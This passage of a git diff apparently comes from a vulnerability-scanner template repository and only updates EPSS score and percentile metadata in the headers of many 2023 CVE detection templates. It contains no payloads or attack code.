cpe:2.3:a:sonicwall:analytics:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml index 5069af60bd..de301e66ae 100644 --- a/http/cves/2023/CVE-2023-34192.yaml +++ b/http/cves/2023/CVE-2023-34192.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9 cve-id: CVE-2023-34192 cwe-id: CWE-79 - epss-score: 0.18605 - epss-percentile: 0.95718 + epss-score: 0.17094 + epss-percentile: 0.95587 cpe: cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-34259.yaml b/http/cves/2023/CVE-2023-34259.yaml index 0ed3c11e41..1e6180ee82 100644 --- a/http/cves/2023/CVE-2023-34259.yaml +++ b/http/cves/2023/CVE-2023-34259.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-34259 cwe-id: CWE-22 epss-score: 0.00554 - epss-percentile: 0.74971 + epss-percentile: 0.75129 cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34362.yaml b/http/cves/2023/CVE-2023-34362.yaml index 09ac79e066..84bbbf8816 100644 --- a/http/cves/2023/CVE-2023-34362.yaml +++ b/http/cves/2023/CVE-2023-34362.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34362 cwe-id: CWE-89 - epss-score: 0.92502 - epss-percentile: 0.98756 + epss-score: 0.89942 + epss-percentile: 0.98542 cpe: cpe:2.3:a:progress:moveit_cloud:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index 3ac1311c9e..016a6d95fc 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-34537 cwe-id: CWE-79 epss-score: 0.0007 - epss-percentile: 0.28945 + epss-percentile: 0.28902 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index ab95f734a6..68176ca18c 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-34598 cwe-id: CWE-22 epss-score: 0.03362 - epss-percentile: 0.90364 + epss-percentile: 0.90424 cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml index 1857a317c4..0c58d3c438 100644 --- a/http/cves/2023/CVE-2023-34599.yaml +++ b/http/cves/2023/CVE-2023-34599.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-34599 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29238 + epss-percentile: 0.29205 cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-3460.yaml b/http/cves/2023/CVE-2023-3460.yaml index 725933c86f..821c02127b 100644 --- a/http/cves/2023/CVE-2023-3460.yaml +++ b/http/cves/2023/CVE-2023-3460.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-3460 cwe-id: CWE-269 epss-score: 0.08148 - epss-percentile: 0.93676 + epss-percentile: 0.93712 cpe: cpe:2.3:a:ultimatemember:ultimate_member:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml index 9f1d3c5856..39fd1019b8 100644 --- a/http/cves/2023/CVE-2023-34659.yaml +++ b/http/cves/2023/CVE-2023-34659.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34659 cwe-id: CWE-89 - epss-score: 0.05183 - epss-percentile: 0.92154 + epss-score: 0.04846 + epss-percentile: 0.9195 cpe: cpe:2.3:a:jeecg:jeecg_boot:3.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-34751.yaml b/http/cves/2023/CVE-2023-34751.yaml index 57153c0785..f6169bfff8 100644 --- a/http/cves/2023/CVE-2023-34751.yaml +++ b/http/cves/2023/CVE-2023-34751.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-34751 cwe-id: CWE-89 epss-score: 0.01254 - epss-percentile: 0.83985 + epss-percentile: 0.84081 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34752.yaml b/http/cves/2023/CVE-2023-34752.yaml index 363187b161..758fa71cdc 100644 --- a/http/cves/2023/CVE-2023-34752.yaml +++ b/http/cves/2023/CVE-2023-34752.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-34752 cwe-id: CWE-89 epss-score: 0.05297 - epss-percentile: 0.92262 + epss-percentile: 0.92306 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34753.yaml b/http/cves/2023/CVE-2023-34753.yaml index aedd597bce..e6c5663b50 100644 --- a/http/cves/2023/CVE-2023-34753.yaml +++ b/http/cves/2023/CVE-2023-34753.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-34753 cwe-id: CWE-89 epss-score: 0.01254 - epss-percentile: 0.83985 + epss-percentile: 0.84081 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34755.yaml b/http/cves/2023/CVE-2023-34755.yaml index c86cd4d25c..61451d46c0 100644 --- a/http/cves/2023/CVE-2023-34755.yaml +++ b/http/cves/2023/CVE-2023-34755.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-34755 cwe-id: CWE-89 epss-score: 0.01254 - epss-percentile: 0.83985 + epss-percentile: 0.84081 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34756.yaml b/http/cves/2023/CVE-2023-34756.yaml index d8800eaee6..6e85d1cc02 100644 --- a/http/cves/2023/CVE-2023-34756.yaml +++ b/http/cves/2023/CVE-2023-34756.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-34756 cwe-id: CWE-89 epss-score: 0.01254 - epss-percentile: 0.83985 + epss-percentile: 0.84081 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index baec900a98..b667b8f4ae 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-3479 cwe-id: CWE-79 epss-score: 0.0007 - epss-percentile: 0.28979 + epss-percentile: 0.28923 cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml index e04ca3a5fc..da696983d1 100644 --- a/http/cves/2023/CVE-2023-34843.yaml +++ b/http/cves/2023/CVE-2023-34843.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-34843 cwe-id: CWE-22 epss-score: 0.00349 - epss-percentile: 0.68668 + epss-percentile: 0.68833 cpe: cpe:2.3:a:traggo:traggo:0.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml index a1c000aaa1..6a6d143a73 100644 --- a/http/cves/2023/CVE-2023-34960.yaml +++ b/http/cves/2023/CVE-2023-34960.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34960 cwe-id: CWE-77 - epss-score: 0.88204 - epss-percentile: 0.98383 + epss-score: 0.88811 + epss-percentile: 0.98462 cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-35078.yaml b/http/cves/2023/CVE-2023-35078.yaml index 38a2c264d0..126b65bfe6 100644 --- a/http/cves/2023/CVE-2023-35078.yaml +++ b/http/cves/2023/CVE-2023-35078.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-35078 cwe-id: CWE-287 - epss-score: 0.95301 - epss-percentile: 0.99174 + epss-score: 0.94864 + epss-percentile: 0.99112 cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml index 304e4b9c44..69687bc8a0 100644 --- a/http/cves/2023/CVE-2023-35082.yaml +++ b/http/cves/2023/CVE-2023-35082.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-35082 cwe-id: CWE-287 epss-score: 0.07991 - epss-percentile: 0.93615 + epss-percentile: 0.93656 cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-35813.yaml b/http/cves/2023/CVE-2023-35813.yaml index a9e5b36004..1eeee8e930 100644 --- a/http/cves/2023/CVE-2023-35813.yaml +++ b/http/cves/2023/CVE-2023-35813.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-35813 cwe-id: CWE-22,CWE-23 - epss-score: 0.27106 - epss-percentile: 0.96307 + epss-score: 0.72023 + epss-percentile: 0.97792 cpe: cpe:2.3:a:sitecore:experience_commerce:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml index d312c77220..4dfff42093 100644 --- a/http/cves/2023/CVE-2023-35843.yaml +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-35843 cwe-id: CWE-22 - epss-score: 0.02376 - epss-percentile: 0.88678 + epss-score: 0.02782 + epss-percentile: 0.89547 cpe: cpe:2.3:a:nocodb:nocodb:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml index 3c563047bb..a44f1a4ef1 100644 --- a/http/cves/2023/CVE-2023-35844.yaml +++ b/http/cves/2023/CVE-2023-35844.yaml @@ -24,8 +24,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-35844 cwe-id: CWE-22 - epss-score: 0.00499 - epss-percentile: 0.73585 + epss-score: 0.00782 + epss-percentile: 0.7944 cpe: cpe:2.3:a:lightdash:lightdash:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml index 261ded83b5..69ce779557 100644 --- a/http/cves/2023/CVE-2023-35885.yaml +++ b/http/cves/2023/CVE-2023-35885.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-35885 cwe-id: CWE-565 epss-score: 0.02266 - epss-percentile: 0.88418 + epss-percentile: 0.88471 cpe: cpe:2.3:a:mgt-commerce:cloudpanel:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-36144.yaml b/http/cves/2023/CVE-2023-36144.yaml index 835f1ed97d..8591b17617 100644 --- a/http/cves/2023/CVE-2023-36144.yaml +++ b/http/cves/2023/CVE-2023-36144.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-36144 cwe-id: CWE-862 epss-score: 0.04828 - epss-percentile: 0.91878 + epss-percentile: 0.91938 cpe: cpe:2.3:o:intelbras:sg_2404_mr_firmware:1.00.54:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml index 058831dc9e..658431a8da 100644 --- a/http/cves/2023/CVE-2023-36287.yaml +++ b/http/cves/2023/CVE-2023-36287.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-36287 cwe-id: CWE-79 epss-score: 0.00075 - epss-percentile: 0.30955 + epss-percentile: 0.30832 cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml index bb8dc8850a..a3a9e62cfd 100644 --- a/http/cves/2023/CVE-2023-36289.yaml +++ b/http/cves/2023/CVE-2023-36289.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-36289 cwe-id: CWE-79 epss-score: 0.00075 - epss-percentile: 0.30955 + epss-percentile: 0.30832 cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-36306.yaml b/http/cves/2023/CVE-2023-36306.yaml index 81f059effd..6fdc94874b 100644 --- a/http/cves/2023/CVE-2023-36306.yaml +++ b/http/cves/2023/CVE-2023-36306.yaml @@ -14,8 +14,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-36306 cwe-id: CWE-79 - epss-score: 0.00261 - epss-percentile: 0.63636 + epss-score: 0.00385 + epss-percentile: 0.70284 cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml index da13af49ec..32773e29ee 100644 --- a/http/cves/2023/CVE-2023-36346.yaml +++ b/http/cves/2023/CVE-2023-36346.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-36346 cwe-id: CWE-79 epss-score: 0.00096 - epss-percentile: 0.39814 + epss-percentile: 0.39882 cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-36844.yaml b/http/cves/2023/CVE-2023-36844.yaml index 9108eefadc..34025edca7 100644 --- a/http/cves/2023/CVE-2023-36844.yaml +++ b/http/cves/2023/CVE-2023-36844.yaml @@ -21,8 +21,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-36844 cwe-id: CWE-473 - epss-score: 0.21216 - epss-percentile: 0.95946 + epss-score: 0.03641 + epss-percentile: 0.90771 cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-36845.yaml b/http/cves/2023/CVE-2023-36845.yaml index 7a01387460..9f3ad2d697 100644 --- a/http/cves/2023/CVE-2023-36845.yaml +++ b/http/cves/2023/CVE-2023-36845.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-36845 cwe-id: CWE-473 epss-score: 0.69312 - epss-percentile: 0.97683 + epss-percentile: 0.97711 cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-36934.yaml b/http/cves/2023/CVE-2023-36934.yaml index d6496e7d44..e2a73fc480 100644 --- a/http/cves/2023/CVE-2023-36934.yaml +++ b/http/cves/2023/CVE-2023-36934.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.1 cve-id: CVE-2023-36934 cwe-id: CWE-89 - epss-score: 0.01606 - epss-percentile: 0.86013 + epss-score: 0.01404 + epss-percentile: 0.85016 cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3710.yaml b/http/cves/2023/CVE-2023-3710.yaml index 7f78150bb0..408c2442ec 100644 --- a/http/cves/2023/CVE-2023-3710.yaml +++ b/http/cves/2023/CVE-2023-3710.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-3710 cwe-id: CWE-77,CWE-20 - epss-score: 0.76652 - epss-percentile: 0.97896 + epss-score: 0.75328 + epss-percentile: 0.97883 cpe: cpe:2.3:o:honeywell:pm43_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37265.yaml b/http/cves/2023/CVE-2023-37265.yaml index 747fcfcaa3..2adea0cbae 100644 --- a/http/cves/2023/CVE-2023-37265.yaml +++ b/http/cves/2023/CVE-2023-37265.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-37265 cwe-id: CWE-306 - epss-score: 0.10511 - epss-percentile: 0.94441 + epss-score: 0.09477 + epss-percentile: 0.94174 cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37266.yaml b/http/cves/2023/CVE-2023-37266.yaml index 0669b6e94b..a54fe8af77 100644 --- a/http/cves/2023/CVE-2023-37266.yaml +++ b/http/cves/2023/CVE-2023-37266.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-37266 cwe-id: CWE-287 - epss-score: 0.06246 - epss-percentile: 0.92839 + epss-score: 0.05599 + epss-percentile: 0.92518 cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37270.yaml b/http/cves/2023/CVE-2023-37270.yaml index 5e3354a688..d29dbbb7d3 100644 --- a/http/cves/2023/CVE-2023-37270.yaml +++ b/http/cves/2023/CVE-2023-37270.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-37270 cwe-id: CWE-89 - epss-score: 0.01401 - epss-percentile: 0.84914 + epss-score: 0.01664 + epss-percentile: 0.86269 cpe: cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37462.yaml b/http/cves/2023/CVE-2023-37462.yaml index 89bdcd67b3..cd691b32d3 100644 --- a/http/cves/2023/CVE-2023-37462.yaml +++ b/http/cves/2023/CVE-2023-37462.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-37462 cwe-id: CWE-74 - epss-score: 0.38658 - epss-percentile: 0.96862 + epss-score: 0.42489 + epss-percentile: 0.96989 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37474.yaml b/http/cves/2023/CVE-2023-37474.yaml index 890e3af93e..b228e8d708 100644 --- a/http/cves/2023/CVE-2023-37474.yaml +++ b/http/cves/2023/CVE-2023-37474.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-37474 cwe-id: CWE-22 - epss-score: 0.03396 - epss-percentile: 0.90412 + epss-score: 0.04155 + epss-percentile: 0.91315 cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37580.yaml b/http/cves/2023/CVE-2023-37580.yaml index c6849e91f4..aa953ed960 100644 --- a/http/cves/2023/CVE-2023-37580.yaml +++ b/http/cves/2023/CVE-2023-37580.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-37580 cwe-id: CWE-79 - epss-score: 0.39893 - epss-percentile: 0.96892 + epss-score: 0.27921 + epss-percentile: 0.96384 cpe: cpe:2.3:a:zimbra:zimbra:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml index 8c6935563c..cc1a09411e 100644 --- a/http/cves/2023/CVE-2023-37629.yaml +++ b/http/cves/2023/CVE-2023-37629.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-37629 cwe-id: CWE-434 - epss-score: 0.13691 - epss-percentile: 0.95071 + epss-score: 0.12442 + epss-percentile: 0.949 cpe: cpe:2.3:a:simple_online_piggery_management_system_project:simple_online_piggery_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3765.yaml b/http/cves/2023/CVE-2023-3765.yaml index a815081248..d16dc52521 100644 --- a/http/cves/2023/CVE-2023-3765.yaml +++ b/http/cves/2023/CVE-2023-3765.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-3765 cwe-id: CWE-36 epss-score: 0.00634 - epss-percentile: 0.76733 + epss-percentile: 0.76825 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37679.yaml b/http/cves/2023/CVE-2023-37679.yaml index 2a379eee8a..526243f0f3 100644 --- a/http/cves/2023/CVE-2023-37679.yaml +++ b/http/cves/2023/CVE-2023-37679.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-37679 cwe-id: CWE-77 - epss-score: 0.07012 - epss-percentile: 0.93243 + epss-score: 0.07033 + epss-percentile: 0.93304 cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37728.yaml b/http/cves/2023/CVE-2023-37728.yaml index 6685c61c2f..8730198549 100644 --- a/http/cves/2023/CVE-2023-37728.yaml +++ b/http/cves/2023/CVE-2023-37728.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-37728 cwe-id: CWE-79 epss-score: 0.00167 - epss-percentile: 0.53269 + epss-percentile: 0.53357 cpe: cpe:2.3:a:icewarp:icewarp:10.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37979.yaml b/http/cves/2023/CVE-2023-37979.yaml index b1321983f3..55b7579043 100644 --- a/http/cves/2023/CVE-2023-37979.yaml +++ b/http/cves/2023/CVE-2023-37979.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-37979 cwe-id: CWE-79 - epss-score: 0.00098 - epss-percentile: 0.4041 + epss-score: 0.00084 + epss-percentile: 0.35114 cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38035.yaml b/http/cves/2023/CVE-2023-38035.yaml index 27805e250c..3734821264 100644 --- a/http/cves/2023/CVE-2023-38035.yaml +++ b/http/cves/2023/CVE-2023-38035.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-38035 cwe-id: CWE-863 - epss-score: 0.97094 - epss-percentile: 0.99722 + epss-score: 0.97163 + epss-percentile: 0.99765 cpe: cpe:2.3:a:ivanti:mobileiron_sentry:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38205.yaml b/http/cves/2023/CVE-2023-38205.yaml index b1bfc03904..59bca3dc92 100644 --- a/http/cves/2023/CVE-2023-38205.yaml +++ b/http/cves/2023/CVE-2023-38205.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-38205 cwe-id: CWE-284,NVD-CWE-Other - epss-score: 0.83516 - epss-percentile: 0.98142 + epss-score: 0.84215 + epss-percentile: 0.98205 cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3836.yaml b/http/cves/2023/CVE-2023-3836.yaml index ed827351ae..02f9b31fa1 100644 --- a/http/cves/2023/CVE-2023-3836.yaml +++ b/http/cves/2023/CVE-2023-3836.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-3836 cwe-id: CWE-434 - epss-score: 0.0298 - epss-percentile: 0.89807 + epss-score: 0.02584 + epss-percentile: 0.89161 cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3843.yaml b/http/cves/2023/CVE-2023-3843.yaml index 20d10187db..6d98a32212 100644 --- a/http/cves/2023/CVE-2023-3843.yaml +++ b/http/cves/2023/CVE-2023-3843.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3843 cwe-id: CWE-79 epss-score: 0.002 - epss-percentile: 0.57669 + epss-percentile: 0.57852 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml index fa77141dde..d88fcdbfda 100644 --- a/http/cves/2023/CVE-2023-38433.yaml +++ b/http/cves/2023/CVE-2023-38433.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-38433 cwe-id: CWE-798 - epss-score: 0.00438 - epss-percentile: 0.71879 + epss-score: 0.00392 + epss-percentile: 0.70574 cpe: cpe:2.3:o:fujitsu:ip-he950e_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3844.yaml b/http/cves/2023/CVE-2023-3844.yaml index e181ffa8f8..11950f0769 100644 --- a/http/cves/2023/CVE-2023-3844.yaml +++ b/http/cves/2023/CVE-2023-3844.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3844 cwe-id: CWE-79 epss-score: 0.002 - epss-percentile: 0.57669 + epss-percentile: 0.57852 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3845.yaml b/http/cves/2023/CVE-2023-3845.yaml index e0224d5afe..7136669613 100644 --- a/http/cves/2023/CVE-2023-3845.yaml +++ b/http/cves/2023/CVE-2023-3845.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3845 cwe-id: CWE-79 epss-score: 0.002 - epss-percentile: 0.57683 + epss-percentile: 0.57852 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3846.yaml b/http/cves/2023/CVE-2023-3846.yaml index cb4f2990a3..d0e8f2bdef 100644 --- a/http/cves/2023/CVE-2023-3846.yaml +++ b/http/cves/2023/CVE-2023-3846.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3846 cwe-id: CWE-79 epss-score: 0.002 - epss-percentile: 0.57669 + epss-percentile: 0.57852 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3847.yaml b/http/cves/2023/CVE-2023-3847.yaml index c700233150..a11ad66e2e 100644 --- a/http/cves/2023/CVE-2023-3847.yaml +++ b/http/cves/2023/CVE-2023-3847.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3847 cwe-id: CWE-79 epss-score: 0.002 - epss-percentile: 0.57669 + epss-percentile: 0.57852 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3848.yaml b/http/cves/2023/CVE-2023-3848.yaml index 09fe4430f8..e53de59de3 100644 --- a/http/cves/2023/CVE-2023-3848.yaml +++ b/http/cves/2023/CVE-2023-3848.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3848 cwe-id: CWE-79 epss-score: 0.002 - epss-percentile: 0.57683 + epss-percentile: 0.57852 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3849.yaml b/http/cves/2023/CVE-2023-3849.yaml index 501f09a36d..c023322553 100644 --- a/http/cves/2023/CVE-2023-3849.yaml +++ b/http/cves/2023/CVE-2023-3849.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3849 cwe-id: CWE-79 epss-score: 0.002 - epss-percentile: 0.57683 + epss-percentile: 0.57852 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38501.yaml b/http/cves/2023/CVE-2023-38501.yaml index 97d7006456..bae521f29b 100644 --- a/http/cves/2023/CVE-2023-38501.yaml +++ b/http/cves/2023/CVE-2023-38501.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-38501 cwe-id: CWE-79 - epss-score: 0.00282 - epss-percentile: 0.64989 + epss-score: 0.00271 + epss-percentile: 0.64421 cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38646.yaml b/http/cves/2023/CVE-2023-38646.yaml index 3bd30b8f12..8184c44102 100644 --- a/http/cves/2023/CVE-2023-38646.yaml +++ b/http/cves/2023/CVE-2023-38646.yaml @@ -21,8 +21,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-38646 - epss-score: 0.60445 - epss-percentile: 0.97459 + epss-score: 0.62661 + epss-percentile: 0.97553 cpe: cpe:2.3:a:metabase:metabase:*:*:*:*:-:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39002.yaml b/http/cves/2023/CVE-2023-39002.yaml index 5bcda72f42..bb83c2aa55 100644 --- a/http/cves/2023/CVE-2023-39002.yaml +++ b/http/cves/2023/CVE-2023-39002.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-39002 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 